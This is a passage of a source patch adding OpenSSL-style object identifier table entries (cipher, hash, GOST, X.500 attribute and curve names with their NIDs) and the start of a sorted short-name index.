+{"CAMELLIA-192-ECB","camellia-192-ecb",NID_camellia_192_ecb,8,
+	&(lvalues[5041]),0},
+{"CAMELLIA-256-ECB","camellia-256-ecb",NID_camellia_256_ecb,8,
+	&(lvalues[5049]),0},
+{"CAMELLIA-128-CFB","camellia-128-cfb",NID_camellia_128_cfb128,8,
+	&(lvalues[5057]),0},
+{"CAMELLIA-192-CFB","camellia-192-cfb",NID_camellia_192_cfb128,8,
+	&(lvalues[5065]),0},
+{"CAMELLIA-256-CFB","camellia-256-cfb",NID_camellia_256_cfb128,8,
+	&(lvalues[5073]),0},
+{"CAMELLIA-128-CFB1","camellia-128-cfb1",NID_camellia_128_cfb1,0,NULL,0},
+{"CAMELLIA-192-CFB1","camellia-192-cfb1",NID_camellia_192_cfb1,0,NULL,0},
+{"CAMELLIA-256-CFB1","camellia-256-cfb1",NID_camellia_256_cfb1,0,NULL,0},
+{"CAMELLIA-128-CFB8","camellia-128-cfb8",NID_camellia_128_cfb8,0,NULL,0},
+{"CAMELLIA-192-CFB8","camellia-192-cfb8",NID_camellia_192_cfb8,0,NULL,0},
+{"CAMELLIA-256-CFB8","camellia-256-cfb8",NID_camellia_256_cfb8,0,NULL,0},
+{"CAMELLIA-128-OFB","camellia-128-ofb",NID_camellia_128_ofb128,8,
+	&(lvalues[5081]),0},
+{"CAMELLIA-192-OFB","camellia-192-ofb",NID_camellia_192_ofb128,8,
+	&(lvalues[5089]),0},
+{"CAMELLIA-256-OFB","camellia-256-ofb",NID_camellia_256_ofb128,8,
+	&(lvalues[5097]),0},
+{"subjectDirectoryAttributes","X509v3 Subject Directory Attributes",
+	NID_subject_directory_attributes,3,&(lvalues[5105]),0},
+{"issuingDistributionPoint","X509v3 Issuing Distrubution Point",
+	NID_issuing_distribution_point,3,&(lvalues[5108]),0},
+{"certificateIssuer","X509v3 Certificate Issuer",
+	NID_certificate_issuer,3,&(lvalues[5111]),0},
+{NULL,NULL,NID_undef,0,NULL,0},
+{"KISA","kisa",NID_kisa,6,&(lvalues[5114]),0},
+{NULL,NULL,NID_undef,0,NULL,0},
+{NULL,NULL,NID_undef,0,NULL,0},
+{"SEED-ECB","seed-ecb",NID_seed_ecb,8,&(lvalues[5120]),0},
+{"SEED-CBC","seed-cbc",NID_seed_cbc,8,&(lvalues[5128]),0},
+{"SEED-OFB","seed-ofb",NID_seed_ofb128,8,&(lvalues[5136]),0},
+{"SEED-CFB","seed-cfb",NID_seed_cfb128,8,&(lvalues[5144]),0},
+{"HMAC-MD5","hmac-md5",NID_hmac_md5,8,&(lvalues[5152]),0},
+{"HMAC-SHA1","hmac-sha1",NID_hmac_sha1,8,&(lvalues[5160]),0},
+{"id-PasswordBasedMAC","password based MAC",NID_id_PasswordBasedMAC,9,
+	&(lvalues[5168]),0},
+{"id-DHBasedMac","Diffie-Hellman based MAC",NID_id_DHBasedMac,9,
+	&(lvalues[5177]),0},
+{"id-it-suppLangTags","id-it-suppLangTags",NID_id_it_suppLangTags,8,
+	&(lvalues[5186]),0},
+{"caRepository","CA Repository",NID_caRepository,8,&(lvalues[5194]),0},
+{"id-smime-ct-compressedData","id-smime-ct-compressedData",
+	NID_id_smime_ct_compressedData,11,&(lvalues[5202]),0},
+{"id-ct-asciiTextWithCRLF","id-ct-asciiTextWithCRLF",
+	NID_id_ct_asciiTextWithCRLF,11,&(lvalues[5213]),0},
+{"id-aes128-wrap","id-aes128-wrap",NID_id_aes128_wrap,9,
+	&(lvalues[5224]),0},
+{"id-aes192-wrap","id-aes192-wrap",NID_id_aes192_wrap,9,
+	&(lvalues[5233]),0},
+{"id-aes256-wrap","id-aes256-wrap",NID_id_aes256_wrap,9,
+	&(lvalues[5242]),0},
+{"ecdsa-with-Recommended","ecdsa-with-Recommended",
+	NID_ecdsa_with_Recommended,7,&(lvalues[5251]),0},
+{"ecdsa-with-Specified","ecdsa-with-Specified",
+	NID_ecdsa_with_Specified,7,&(lvalues[5258]),0},
+{"ecdsa-with-SHA224","ecdsa-with-SHA224",NID_ecdsa_with_SHA224,8,
+	&(lvalues[5265]),0},
+{"ecdsa-with-SHA256","ecdsa-with-SHA256",NID_ecdsa_with_SHA256,8,
+	&(lvalues[5273]),0},
+{"ecdsa-with-SHA384","ecdsa-with-SHA384",NID_ecdsa_with_SHA384,8,
+	&(lvalues[5281]),0},
+{"ecdsa-with-SHA512","ecdsa-with-SHA512",NID_ecdsa_with_SHA512,8,
+	&(lvalues[5289]),0},
+{"hmacWithMD5","hmacWithMD5",NID_hmacWithMD5,8,&(lvalues[5297]),0},
+{"hmacWithSHA224","hmacWithSHA224",NID_hmacWithSHA224,8,
+	&(lvalues[5305]),0},
+{"hmacWithSHA256","hmacWithSHA256",NID_hmacWithSHA256,8,
+	&(lvalues[5313]),0},
+{"hmacWithSHA384","hmacWithSHA384",NID_hmacWithSHA384,8,
+	&(lvalues[5321]),0},
+{"hmacWithSHA512","hmacWithSHA512",NID_hmacWithSHA512,8,
+	&(lvalues[5329]),0},
+{"dsa_with_SHA224","dsa_with_SHA224",NID_dsa_with_SHA224,9,
+	&(lvalues[5337]),0},
+{"dsa_with_SHA256","dsa_with_SHA256",NID_dsa_with_SHA256,9,
+	&(lvalues[5346]),0},
+{"whirlpool","whirlpool",NID_whirlpool,6,&(lvalues[5355]),0},
+{"cryptopro","cryptopro",NID_cryptopro,5,&(lvalues[5361]),0},
+{"cryptocom","cryptocom",NID_cryptocom,5,&(lvalues[5366]),0},
+{"id-GostR3411-94-with-GostR3410-2001",
+	"GOST R 34.11-94 with GOST R 34.10-2001",
+	NID_id_GostR3411_94_with_GostR3410_2001,6,&(lvalues[5371]),0},
+{"id-GostR3411-94-with-GostR3410-94",
+	"GOST R 34.11-94 with GOST R 34.10-94",
+	NID_id_GostR3411_94_with_GostR3410_94,6,&(lvalues[5377]),0},
+{"md_gost94","GOST R 34.11-94",NID_id_GostR3411_94,6,&(lvalues[5383]),0},
+{"id-HMACGostR3411-94","HMAC GOST 34.11-94",NID_id_HMACGostR3411_94,6,
+	&(lvalues[5389]),0},
+{"gost2001","GOST R 34.10-2001",NID_id_GostR3410_2001,6,
+	&(lvalues[5395]),0},
+{"gost94","GOST R 34.10-94",NID_id_GostR3410_94,6,&(lvalues[5401]),0},
+{"gost89","GOST 28147-89",NID_id_Gost28147_89,6,&(lvalues[5407]),0},
+{"gost89-cnt","gost89-cnt",NID_gost89_cnt,0,NULL,0},
+{"gost-mac","GOST 28147-89 MAC",NID_id_Gost28147_89_MAC,6,
+	&(lvalues[5413]),0},
+{"prf-gostr3411-94","GOST R 34.11-94 PRF",NID_id_GostR3411_94_prf,6,
+	&(lvalues[5419]),0},
+{"id-GostR3410-2001DH","GOST R 34.10-2001 DH",NID_id_GostR3410_2001DH,
+	6,&(lvalues[5425]),0},
+{"id-GostR3410-94DH","GOST R 34.10-94 DH",NID_id_GostR3410_94DH,6,
+	&(lvalues[5431]),0},
+{"id-Gost28147-89-CryptoPro-KeyMeshing",
+	"id-Gost28147-89-CryptoPro-KeyMeshing",
+	NID_id_Gost28147_89_CryptoPro_KeyMeshing,7,&(lvalues[5437]),0},
+{"id-Gost28147-89-None-KeyMeshing","id-Gost28147-89-None-KeyMeshing",
+	NID_id_Gost28147_89_None_KeyMeshing,7,&(lvalues[5444]),0},
+{"id-GostR3411-94-TestParamSet","id-GostR3411-94-TestParamSet",
+	NID_id_GostR3411_94_TestParamSet,7,&(lvalues[5451]),0},
+{"id-GostR3411-94-CryptoProParamSet",
+	"id-GostR3411-94-CryptoProParamSet",
+	NID_id_GostR3411_94_CryptoProParamSet,7,&(lvalues[5458]),0},
+{"id-Gost28147-89-TestParamSet","id-Gost28147-89-TestParamSet",
+	NID_id_Gost28147_89_TestParamSet,7,&(lvalues[5465]),0},
+{"id-Gost28147-89-CryptoPro-A-ParamSet",
+	"id-Gost28147-89-CryptoPro-A-ParamSet",
+	NID_id_Gost28147_89_CryptoPro_A_ParamSet,7,&(lvalues[5472]),0},
+{"id-Gost28147-89-CryptoPro-B-ParamSet",
+	"id-Gost28147-89-CryptoPro-B-ParamSet",
+	NID_id_Gost28147_89_CryptoPro_B_ParamSet,7,&(lvalues[5479]),0},
+{"id-Gost28147-89-CryptoPro-C-ParamSet",
+	"id-Gost28147-89-CryptoPro-C-ParamSet",
+	NID_id_Gost28147_89_CryptoPro_C_ParamSet,7,&(lvalues[5486]),0},
+{"id-Gost28147-89-CryptoPro-D-ParamSet",
+	"id-Gost28147-89-CryptoPro-D-ParamSet",
+	NID_id_Gost28147_89_CryptoPro_D_ParamSet,7,&(lvalues[5493]),0},
+{"id-Gost28147-89-CryptoPro-Oscar-1-1-ParamSet",
+	"id-Gost28147-89-CryptoPro-Oscar-1-1-ParamSet",
+	NID_id_Gost28147_89_CryptoPro_Oscar_1_1_ParamSet,7,&(lvalues[5500]),
+	0},
+{"id-Gost28147-89-CryptoPro-Oscar-1-0-ParamSet",
+	"id-Gost28147-89-CryptoPro-Oscar-1-0-ParamSet",
+	NID_id_Gost28147_89_CryptoPro_Oscar_1_0_ParamSet,7,&(lvalues[5507]),
+	0},
+{"id-Gost28147-89-CryptoPro-RIC-1-ParamSet",
+	"id-Gost28147-89-CryptoPro-RIC-1-ParamSet",
+	NID_id_Gost28147_89_CryptoPro_RIC_1_ParamSet,7,&(lvalues[5514]),0},
+{"id-GostR3410-94-TestParamSet","id-GostR3410-94-TestParamSet",
+	NID_id_GostR3410_94_TestParamSet,7,&(lvalues[5521]),0},
+{"id-GostR3410-94-CryptoPro-A-ParamSet",
+	"id-GostR3410-94-CryptoPro-A-ParamSet",
+	NID_id_GostR3410_94_CryptoPro_A_ParamSet,7,&(lvalues[5528]),0},
+{"id-GostR3410-94-CryptoPro-B-ParamSet",
+	"id-GostR3410-94-CryptoPro-B-ParamSet",
+	NID_id_GostR3410_94_CryptoPro_B_ParamSet,7,&(lvalues[5535]),0},
+{"id-GostR3410-94-CryptoPro-C-ParamSet",
+	"id-GostR3410-94-CryptoPro-C-ParamSet",
+	NID_id_GostR3410_94_CryptoPro_C_ParamSet,7,&(lvalues[5542]),0},
+{"id-GostR3410-94-CryptoPro-D-ParamSet",
+	"id-GostR3410-94-CryptoPro-D-ParamSet",
+	NID_id_GostR3410_94_CryptoPro_D_ParamSet,7,&(lvalues[5549]),0},
+{"id-GostR3410-94-CryptoPro-XchA-ParamSet",
+	"id-GostR3410-94-CryptoPro-XchA-ParamSet",
+	NID_id_GostR3410_94_CryptoPro_XchA_ParamSet,7,&(lvalues[5556]),0},
+{"id-GostR3410-94-CryptoPro-XchB-ParamSet",
+	"id-GostR3410-94-CryptoPro-XchB-ParamSet",
+	NID_id_GostR3410_94_CryptoPro_XchB_ParamSet,7,&(lvalues[5563]),0},
+{"id-GostR3410-94-CryptoPro-XchC-ParamSet",
+	"id-GostR3410-94-CryptoPro-XchC-ParamSet",
+	NID_id_GostR3410_94_CryptoPro_XchC_ParamSet,7,&(lvalues[5570]),0},
+{"id-GostR3410-2001-TestParamSet","id-GostR3410-2001-TestParamSet",
+	NID_id_GostR3410_2001_TestParamSet,7,&(lvalues[5577]),0},
+{"id-GostR3410-2001-CryptoPro-A-ParamSet",
+	"id-GostR3410-2001-CryptoPro-A-ParamSet",
+	NID_id_GostR3410_2001_CryptoPro_A_ParamSet,7,&(lvalues[5584]),0},
+{"id-GostR3410-2001-CryptoPro-B-ParamSet",
+	"id-GostR3410-2001-CryptoPro-B-ParamSet",
+	NID_id_GostR3410_2001_CryptoPro_B_ParamSet,7,&(lvalues[5591]),0},
+{"id-GostR3410-2001-CryptoPro-C-ParamSet",
+	"id-GostR3410-2001-CryptoPro-C-ParamSet",
+	NID_id_GostR3410_2001_CryptoPro_C_ParamSet,7,&(lvalues[5598]),0},
+{"id-GostR3410-2001-CryptoPro-XchA-ParamSet",
+	"id-GostR3410-2001-CryptoPro-XchA-ParamSet",
+	NID_id_GostR3410_2001_CryptoPro_XchA_ParamSet,7,&(lvalues[5605]),0},
+	
+{"id-GostR3410-2001-CryptoPro-XchB-ParamSet",
+	"id-GostR3410-2001-CryptoPro-XchB-ParamSet",
+	NID_id_GostR3410_2001_CryptoPro_XchB_ParamSet,7,&(lvalues[5612]),0},
+	
+{"id-GostR3410-94-a","id-GostR3410-94-a",NID_id_GostR3410_94_a,7,
+	&(lvalues[5619]),0},
+{"id-GostR3410-94-aBis","id-GostR3410-94-aBis",
+	NID_id_GostR3410_94_aBis,7,&(lvalues[5626]),0},
+{"id-GostR3410-94-b","id-GostR3410-94-b",NID_id_GostR3410_94_b,7,
+	&(lvalues[5633]),0},
+{"id-GostR3410-94-bBis","id-GostR3410-94-bBis",
+	NID_id_GostR3410_94_bBis,7,&(lvalues[5640]),0},
+{"id-Gost28147-89-cc","GOST 28147-89 Cryptocom ParamSet",
+	NID_id_Gost28147_89_cc,8,&(lvalues[5647]),0},
+{"gost94cc","GOST 34.10-94 Cryptocom",NID_id_GostR3410_94_cc,8,
+	&(lvalues[5655]),0},
+{"gost2001cc","GOST 34.10-2001 Cryptocom",NID_id_GostR3410_2001_cc,8,
+	&(lvalues[5663]),0},
+{"id-GostR3411-94-with-GostR3410-94-cc",
+	"GOST R 34.11-94 with GOST R 34.10-94 Cryptocom",
+	NID_id_GostR3411_94_with_GostR3410_94_cc,8,&(lvalues[5671]),0},
+{"id-GostR3411-94-with-GostR3410-2001-cc",
+	"GOST R 34.11-94 with GOST R 34.10-2001 Cryptocom",
+	NID_id_GostR3411_94_with_GostR3410_2001_cc,8,&(lvalues[5679]),0},
+{"id-GostR3410-2001-ParamSet-cc",
+	"GOST R 3410-2001 Parameter Set Cryptocom",
+	NID_id_GostR3410_2001_ParamSet_cc,8,&(lvalues[5687]),0},
+{"HMAC","hmac",NID_hmac,0,NULL,0},
+{"LocalKeySet","Microsoft Local Key set",NID_LocalKeySet,9,
+	&(lvalues[5695]),0},
+{"freshestCRL","X509v3 Freshest CRL",NID_freshest_crl,3,
+	&(lvalues[5704]),0},
+{"id-on-permanentIdentifier","Permanent Identifier",
+	NID_id_on_permanentIdentifier,8,&(lvalues[5707]),0},
+{"searchGuide","searchGuide",NID_searchGuide,3,&(lvalues[5715]),0},
+{"businessCategory","businessCategory",NID_businessCategory,3,
+	&(lvalues[5718]),0},
+{"postalAddress","postalAddress",NID_postalAddress,3,&(lvalues[5721]),0},
+{"postOfficeBox","postOfficeBox",NID_postOfficeBox,3,&(lvalues[5724]),0},
+{"physicalDeliveryOfficeName","physicalDeliveryOfficeName",
+	NID_physicalDeliveryOfficeName,3,&(lvalues[5727]),0},
+{"telephoneNumber","telephoneNumber",NID_telephoneNumber,3,
+	&(lvalues[5730]),0},
+{"telexNumber","telexNumber",NID_telexNumber,3,&(lvalues[5733]),0},
+{"teletexTerminalIdentifier","teletexTerminalIdentifier",
+	NID_teletexTerminalIdentifier,3,&(lvalues[5736]),0},
+{"facsimileTelephoneNumber","facsimileTelephoneNumber",
+	NID_facsimileTelephoneNumber,3,&(lvalues[5739]),0},
+{"x121Address","x121Address",NID_x121Address,3,&(lvalues[5742]),0},
+{"internationaliSDNNumber","internationaliSDNNumber",
+	NID_internationaliSDNNumber,3,&(lvalues[5745]),0},
+{"registeredAddress","registeredAddress",NID_registeredAddress,3,
+	&(lvalues[5748]),0},
+{"destinationIndicator","destinationIndicator",
+	NID_destinationIndicator,3,&(lvalues[5751]),0},
+{"preferredDeliveryMethod","preferredDeliveryMethod",
+	NID_preferredDeliveryMethod,3,&(lvalues[5754]),0},
+{"presentationAddress","presentationAddress",NID_presentationAddress,
+	3,&(lvalues[5757]),0},
+{"supportedApplicationContext","supportedApplicationContext",
+	NID_supportedApplicationContext,3,&(lvalues[5760]),0},
+{"member","member",NID_member,3,&(lvalues[5763]),0},
+{"owner","owner",NID_owner,3,&(lvalues[5766]),0},
+{"roleOccupant","roleOccupant",NID_roleOccupant,3,&(lvalues[5769]),0},
+{"seeAlso","seeAlso",NID_seeAlso,3,&(lvalues[5772]),0},
+{"userPassword","userPassword",NID_userPassword,3,&(lvalues[5775]),0},
+{"userCertificate","userCertificate",NID_userCertificate,3,
+	&(lvalues[5778]),0},
+{"cACertificate","cACertificate",NID_cACertificate,3,&(lvalues[5781]),0},
+{"authorityRevocationList","authorityRevocationList",
+	NID_authorityRevocationList,3,&(lvalues[5784]),0},
+{"certificateRevocationList","certificateRevocationList",
+	NID_certificateRevocationList,3,&(lvalues[5787]),0},
+{"crossCertificatePair","crossCertificatePair",
+	NID_crossCertificatePair,3,&(lvalues[5790]),0},
+{"enhancedSearchGuide","enhancedSearchGuide",NID_enhancedSearchGuide,
+	3,&(lvalues[5793]),0},
+{"protocolInformation","protocolInformation",NID_protocolInformation,
+	3,&(lvalues[5796]),0},
+{"distinguishedName","distinguishedName",NID_distinguishedName,3,
+	&(lvalues[5799]),0},
+{"uniqueMember","uniqueMember",NID_uniqueMember,3,&(lvalues[5802]),0},
+{"houseIdentifier","houseIdentifier",NID_houseIdentifier,3,
+	&(lvalues[5805]),0},
+{"supportedAlgorithms","supportedAlgorithms",NID_supportedAlgorithms,
+	3,&(lvalues[5808]),0},
+{"deltaRevocationList","deltaRevocationList",NID_deltaRevocationList,
+	3,&(lvalues[5811]),0},
+{"dmdName","dmdName",NID_dmdName,3,&(lvalues[5814]),0},
+{"id-alg-PWRI-KEK","id-alg-PWRI-KEK",NID_id_alg_PWRI_KEK,11,
+	&(lvalues[5817]),0},
+{"CMAC","cmac",NID_cmac,0,NULL,0},
+{"id-aes128-GCM","aes-128-gcm",NID_aes_128_gcm,9,&(lvalues[5828]),0},
+{"id-aes128-CCM","aes-128-ccm",NID_aes_128_ccm,9,&(lvalues[5837]),0},
+{"id-aes128-wrap-pad","id-aes128-wrap-pad",NID_id_aes128_wrap_pad,9,
+	&(lvalues[5846]),0},
+{"id-aes192-GCM","aes-192-gcm",NID_aes_192_gcm,9,&(lvalues[5855]),0},
+{"id-aes192-CCM","aes-192-ccm",NID_aes_192_ccm,9,&(lvalues[5864]),0},
+{"id-aes192-wrap-pad","id-aes192-wrap-pad",NID_id_aes192_wrap_pad,9,
+	&(lvalues[5873]),0},
+{"id-aes256-GCM","aes-256-gcm",NID_aes_256_gcm,9,&(lvalues[5882]),0},
+{"id-aes256-CCM","aes-256-ccm",NID_aes_256_ccm,9,&(lvalues[5891]),0},
+{"id-aes256-wrap-pad","id-aes256-wrap-pad",NID_id_aes256_wrap_pad,9,
+	&(lvalues[5900]),0},
+{"AES-128-CTR","aes-128-ctr",NID_aes_128_ctr,0,NULL,0},
+{"AES-192-CTR","aes-192-ctr",NID_aes_192_ctr,0,NULL,0},
+{"AES-256-CTR","aes-256-ctr",NID_aes_256_ctr,0,NULL,0},
+{"id-camellia128-wrap","id-camellia128-wrap",NID_id_camellia128_wrap,
+	11,&(lvalues[5909]),0},
+{"id-camellia192-wrap","id-camellia192-wrap",NID_id_camellia192_wrap,
+	11,&(lvalues[5920]),0},
+{"id-camellia256-wrap","id-camellia256-wrap",NID_id_camellia256_wrap,
+	11,&(lvalues[5931]),0},
+{"anyExtendedKeyUsage","Any Extended Key Usage",
+	NID_anyExtendedKeyUsage,4,&(lvalues[5942]),0},
+{"MGF1","mgf1",NID_mgf1,9,&(lvalues[5946]),0},
+{"RSASSA-PSS","rsassaPss",NID_rsassaPss,9,&(lvalues[5955]),0},
+{"AES-128-XTS","aes-128-xts",NID_aes_128_xts,0,NULL,0},
+{"AES-256-XTS","aes-256-xts",NID_aes_256_xts,0,NULL,0},
+{"RC4-HMAC-MD5","rc4-hmac-md5",NID_rc4_hmac_md5,0,NULL,0},
+{"AES-128-CBC-HMAC-SHA1","aes-128-cbc-hmac-sha1",
+	NID_aes_128_cbc_hmac_sha1,0,NULL,0},
+{"AES-192-CBC-HMAC-SHA1","aes-192-cbc-hmac-sha1",
+	NID_aes_192_cbc_hmac_sha1,0,NULL,0},
+{"AES-256-CBC-HMAC-SHA1","aes-256-cbc-hmac-sha1",
+	NID_aes_256_cbc_hmac_sha1,0,NULL,0},
+{"RSAES-OAEP","rsaesOaep",NID_rsaesOaep,9,&(lvalues[5964]),0},
+{"dhpublicnumber","X9.42 DH",NID_dhpublicnumber,7,&(lvalues[5973]),0},
+{"brainpoolP160r1","brainpoolP160r1",NID_brainpoolP160r1,9,
+	&(lvalues[5980]),0},
+{"brainpoolP160t1","brainpoolP160t1",NID_brainpoolP160t1,9,
+	&(lvalues[5989]),0},
+{"brainpoolP192r1","brainpoolP192r1",NID_brainpoolP192r1,9,
+	&(lvalues[5998]),0},
+{"brainpoolP192t1","brainpoolP192t1",NID_brainpoolP192t1,9,
+	&(lvalues[6007]),0},
+{"brainpoolP224r1","brainpoolP224r1",NID_brainpoolP224r1,9,
+	&(lvalues[6016]),0},
+{"brainpoolP224t1","brainpoolP224t1",NID_brainpoolP224t1,9,
+	&(lvalues[6025]),0},
+{"brainpoolP256r1","brainpoolP256r1",NID_brainpoolP256r1,9,
+	&(lvalues[6034]),0},
+{"brainpoolP256t1","brainpoolP256t1",NID_brainpoolP256t1,9,
+	&(lvalues[6043]),0},
+{"brainpoolP320r1","brainpoolP320r1",NID_brainpoolP320r1,9,
+	&(lvalues[6052]),0},
+{"brainpoolP320t1","brainpoolP320t1",NID_brainpoolP320t1,9,
+	&(lvalues[6061]),0},
+{"brainpoolP384r1","brainpoolP384r1",NID_brainpoolP384r1,9,
+	&(lvalues[6070]),0},
+{"brainpoolP384t1","brainpoolP384t1",NID_brainpoolP384t1,9,
+	&(lvalues[6079]),0},
+{"brainpoolP512r1","brainpoolP512r1",NID_brainpoolP512r1,9,
+	&(lvalues[6088]),0},
+{"brainpoolP512t1","brainpoolP512t1",NID_brainpoolP512t1,9,
+	&(lvalues[6097]),0},
+{"PSPECIFIED","pSpecified",NID_pSpecified,9,&(lvalues[6106]),0},
+{"dhSinglePass-stdDH-sha1kdf-scheme",
+	"dhSinglePass-stdDH-sha1kdf-scheme",
+	NID_dhSinglePass_stdDH_sha1kdf_scheme,9,&(lvalues[6115]),0},
+{"dhSinglePass-stdDH-sha224kdf-scheme",
+	"dhSinglePass-stdDH-sha224kdf-scheme",
+	NID_dhSinglePass_stdDH_sha224kdf_scheme,6,&(lvalues[6124]),0},
+{"dhSinglePass-stdDH-sha256kdf-scheme",
+	"dhSinglePass-stdDH-sha256kdf-scheme",
+	NID_dhSinglePass_stdDH_sha256kdf_scheme,6,&(lvalues[6130]),0},
+{"dhSinglePass-stdDH-sha384kdf-scheme",
+	"dhSinglePass-stdDH-sha384kdf-scheme",
+	NID_dhSinglePass_stdDH_sha384kdf_scheme,6,&(lvalues[6136]),0},
+{"dhSinglePass-stdDH-sha512kdf-scheme",
+	"dhSinglePass-stdDH-sha512kdf-scheme",
+	NID_dhSinglePass_stdDH_sha512kdf_scheme,6,&(lvalues[6142]),0},
+{"dhSinglePass-cofactorDH-sha1kdf-scheme",
+	"dhSinglePass-cofactorDH-sha1kdf-scheme",
+	NID_dhSinglePass_cofactorDH_sha1kdf_scheme,9,&(lvalues[6148]),0},
+{"dhSinglePass-cofactorDH-sha224kdf-scheme",
+	"dhSinglePass-cofactorDH-sha224kdf-scheme",
+	NID_dhSinglePass_cofactorDH_sha224kdf_scheme,6,&(lvalues[6157]),0},
+{"dhSinglePass-cofactorDH-sha256kdf-scheme",
+	"dhSinglePass-cofactorDH-sha256kdf-scheme",
+	NID_dhSinglePass_cofactorDH_sha256kdf_scheme,6,&(lvalues[6163]),0},
+{"dhSinglePass-cofactorDH-sha384kdf-scheme",
+	"dhSinglePass-cofactorDH-sha384kdf-scheme",
+	NID_dhSinglePass_cofactorDH_sha384kdf_scheme,6,&(lvalues[6169]),0},
+{"dhSinglePass-cofactorDH-sha512kdf-scheme",
+	"dhSinglePass-cofactorDH-sha512kdf-scheme",
+	NID_dhSinglePass_cofactorDH_sha512kdf_scheme,6,&(lvalues[6175]),0},
+{"dh-std-kdf","dh-std-kdf",NID_dh_std_kdf,0,NULL,0},
+{"dh-cofactor-kdf","dh-cofactor-kdf",NID_dh_cofactor_kdf,0,NULL,0},
+{"AES-128-CBC-HMAC-SHA256","aes-128-cbc-hmac-sha256",
+	NID_aes_128_cbc_hmac_sha256,0,NULL,0},
+{"AES-192-CBC-HMAC-SHA256","aes-192-cbc-hmac-sha256",
+	NID_aes_192_cbc_hmac_sha256,0,NULL,0},
+{"AES-256-CBC-HMAC-SHA256","aes-256-cbc-hmac-sha256",
+	NID_aes_256_cbc_hmac_sha256,0,NULL,0},
+{"ct_precert_scts","CT Precertificate SCTs",NID_ct_precert_scts,10,
+	&(lvalues[6181]),0},
+{"ct_precert_poison","CT Precertificate Poison",NID_ct_precert_poison,
+	10,&(lvalues[6191]),0},
+{"ct_precert_signer","CT Precertificate Signer",NID_ct_precert_signer,
+	10,&(lvalues[6201]),0},
+{"ct_cert_scts","CT Certificate SCTs",NID_ct_cert_scts,10,
+	&(lvalues[6211]),0},
+{"jurisdictionL","jurisdictionLocalityName",
+	NID_jurisdictionLocalityName,11,&(lvalues[6221]),0},
+{"jurisdictionST","jurisdictionStateOrProvinceName",
+	NID_jurisdictionStateOrProvinceName,11,&(lvalues[6232]),0},
+{"jurisdictionC","jurisdictionCountryName",
+	NID_jurisdictionCountryName,11,&(lvalues[6243]),0},
+};
+
+static const unsigned int sn_objs[NUM_SN]={
+364,	/* "AD_DVCS" */
+419,	/* "AES-128-CBC" */
+916,	/* "AES-128-CBC-HMAC-SHA1" */
+948,	/* "AES-128-CBC-HMAC-SHA256" */
+421,	/* "AES-128-CFB" */
+650,	/* "AES-128-CFB1" */
+653,	/* "AES-128-CFB8" */
+904,	/* "AES-128-CTR" */
+418,	/* "AES-128-ECB" */
+420,	/* "AES-128-OFB" */
+913,	/* "AES-128-XTS" */
+423,	/* "AES-192-CBC" */
+917,	/* "AES-192-CBC-HMAC-SHA1" */
+949,	/* "AES-192-CBC-HMAC-SHA256" */
+425,	/* "AES-192-CFB" */
+651,	/* "AES-192-CFB1" */
+654,	/* "AES-192-CFB8" */
+905,	/* "AES-192-CTR" */
+422,	/* "AES-192-ECB" */
+424,	/* "AES-192-OFB" */
+427,	/* "AES-256-CBC" */
+918,	/* "AES-256-CBC-HMAC-SHA1" */
+950,	/* "AES-256-CBC-HMAC-SHA256" */
+429,	/* "AES-256-CFB" */
+652,	/* "AES-256-CFB1" */
+655,	/* "AES-256-CFB8" */
+906,	/* "AES-256-CTR" */
+426,	/* "AES-256-ECB" */
+428,	/* "AES-256-OFB" */
+914,	/* "AES-256-XTS" */
+91,	/* "BF-CBC" */
+93,	/* "BF-CFB" */
+92,	/* "BF-ECB" */
+94,	/* "BF-OFB" */
+14,	/* "C" */
+751,	/* "CAMELLIA-128-CBC" */
+757,	/* "CAMELLIA-128-CFB" */
+760,	/* "CAMELLIA-128-CFB1" */
+763,	/* "CAMELLIA-128-CFB8" */
+754,	/* "CAMELLIA-128-ECB" */
+766,	/* "CAMELLIA-128-OFB" */
+752,	/* "CAMELLIA-192-CBC" */
+758,	/* "CAMELLIA-192-CFB" */
+761,	/* "CAMELLIA-192-CFB1" */
+764,	/* "CAMELLIA-192-CFB8" */
+755,	/* "CAMELLIA-192-ECB" */
+767,	/* "CAMELLIA-192-OFB" */
+753,	/* "CAMELLIA-256-CBC" */
+759,	/* "CAMELLIA-256-CFB" */
+762,	/* "CAMELLIA-256-CFB1" */
+765,	/* "CAMELLIA-256-CFB8" */
+756,	/* "CAMELLIA-256-ECB" */
+768,	/* "CAMELLIA-256-OFB" */
+108,	/* "CAST5-CBC" */
+110,	/* "CAST5-CFB" */
+109,	/* "CAST5-ECB" */
+111,	/* "CAST5-OFB" */
+894,	/* "CMAC" */
+13,	/* "CN" */
+141,	/* "CRLReason" */
+417,	/* "CSPName" */
+367,	/* "CrlID" */
+391,	/* "DC" */
+31,	/* "DES-CBC" */
+643,	/* "DES-CDMF" */
+30,	/* "DES-CFB" */
+656,	/* "DES-CFB1" */
+657,	/* "DES-CFB8" */
+29,	/* "DES-ECB" */
+32,	/* "DES-EDE" */
+43,	/* "DES-EDE-CBC" */
+60,	/* "DES-EDE-CFB" */
+62,	/* "DES-EDE-OFB" */
+33,	/* "DES-EDE3" */
+44,	/* "DES-EDE3-CBC" */
+61,	/* "DES-EDE3-CFB" */
+658,	/* "DES-EDE3-CFB1" */
+659,	/* "DES-EDE3-CFB8" */
+63,	/* "DES-EDE3-OFB" */
+45,	/* "DES-OFB" */
+80,	/* "DESX-CBC" */
+380,	/* "DOD" */
+116,	/* "DSA" */
+66,	/* "DSA-SHA" */
+113,	/* "DSA-SHA1" */
+70,	/* "DSA-SHA1-old" */
+67,	/* "DSA-old" */
+297,	/* "DVCS" */
+99,	/* "GN" */
+855,	/* "HMAC" */
+780,	/* "HMAC-MD5" */
+781,	/* "HMAC-SHA1" */
+381,	/* "IANA" */
+34,	/* "IDEA-CBC" */
+35,	/* "IDEA-CFB" */
+36,	/* "IDEA-ECB" */
+46,	/* "IDEA-OFB" */
+181,	/* "ISO" */
+183,	/* "ISO-US" */
+645,	/* "ITU-T" */
+646,	/* "JOINT-ISO-ITU-T" */
+773,	/* "KISA" */
+15,	/* "L" */
+856,	/* "LocalKeySet" */
+ 3,	/* "MD2" */
+257,	/* "MD4" */
+ 4,	/* "MD5" */
+114,	/* "MD5-SHA1" */
+95,	/* "MDC2" */
+911,	/* "MGF1" */
+388,	/* "Mail" */
+393,	/* "NULL" */
+404,	/* "NULL" */
+57,	/* "Netscape" */
+366,	/* "Nonce" */
+17,	/* "O" */
+178,	/* "OCSP" */
+180,	/* "OCSPSigning" */
+379,	/* "ORG" */
+18,	/* "OU" */
+749,	/* "Oakley-EC2N-3" */
+750,	/* "Oakley-EC2N-4" */
